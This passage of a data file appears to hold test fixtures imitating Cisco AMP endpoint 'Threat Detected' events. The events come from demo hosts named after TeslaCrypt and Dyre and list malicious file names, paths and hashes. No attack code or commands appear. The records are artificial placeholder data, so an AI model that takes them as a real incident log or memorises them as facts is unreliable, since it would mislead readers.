Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat 
